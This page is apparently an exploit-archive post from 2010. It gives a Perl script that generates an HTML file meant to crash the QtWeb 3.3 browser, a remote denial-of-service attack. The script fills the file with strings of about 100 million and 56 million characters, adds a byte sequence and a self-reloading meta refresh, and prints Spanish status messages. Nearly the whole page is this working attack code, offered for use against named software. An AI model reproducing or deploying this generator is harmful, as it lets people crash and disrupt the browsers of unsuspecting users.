Home / os / win7

QtWeb 3.3 Remote DoS / Crash Exploit

Posted on 03 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QtWeb 3.3 Remote DoS / Crash Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== QtWeb 3.3 Remote DoS / Crash Exploit ==================================== # Title:QtWeb 3.3 Remote DoS/Crash Exploit # Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable: http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Platform:Windows _____ _____ _ _ | __ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ / _ / __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/ Exploit ---------------- #!/usr/bin/perl # File Name :QtWeb 3.3 Remote DoS/Crash Exploit # Vuln :Remote Dos/Crash # Author :PoisonCode # Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit # Date:02/06/2010 # Author:PoisonCode # Site :http://www.qtweb.net/ # Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable:http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Tested on: Windows $file=&quot;Exploit QtWeb 3.3.html&quot;; print &quot; ====================================== &quot;; print &quot; = QtWeb 3.3 Remote DoS/Crash Exploit = &quot;; print &quot; = Autor:PoisonCode = &quot;; print &quot; = Web :PanamaSecurity.blogspot.com = &quot;; print &quot; ====================================== &quot;; print &quot; &quot;; print &quot; Espere Mientras se Genera el Exploit &quot;; my $a=&quot;x55&quot; x 100000000; my $b=&quot;85&quot; x 55900000; my $c=&quot;x7Cx95x64xAEx00x96xbdx40x00x098a86x5Ax65x72x30x0x54x68x75x6Ex64x65x72&quot;; open(myfile,&quot;&gt;&gt;$file&quot;); print myfile &quot;&lt;html&gt;&quot;; print myfile &quot;&lt;title&gt;PanamaSecurity - PoisonCode $c &lt;/title&gt;&quot;; print myfile '&lt;head&gt;&lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; url=Exploit QtWeb3.3.html&quot;&gt;&lt;/head&gt;'; print myfile &quot;&lt;body alink=&quot;; print myfile $a,$b,$c; print myfile &quot;&lt;marquee&gt;$a,$b,$c&lt;/marquee&gt;&quot;; print myfile '&quot;&gt;'; print myfile &quot;&lt;/html&gt;&quot;; close(myfile); print &quot; &quot;; print &quot; Nombre del Archivo : $file &quot;; print &quot; Se Ha Creado El Exploit Correctamente &quot;; print &quot; &quot;; print &quot;---------------------------------------------------------------------- &quot;; print &quot; Visiten : PanamaSecurity.blogspot.com &quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP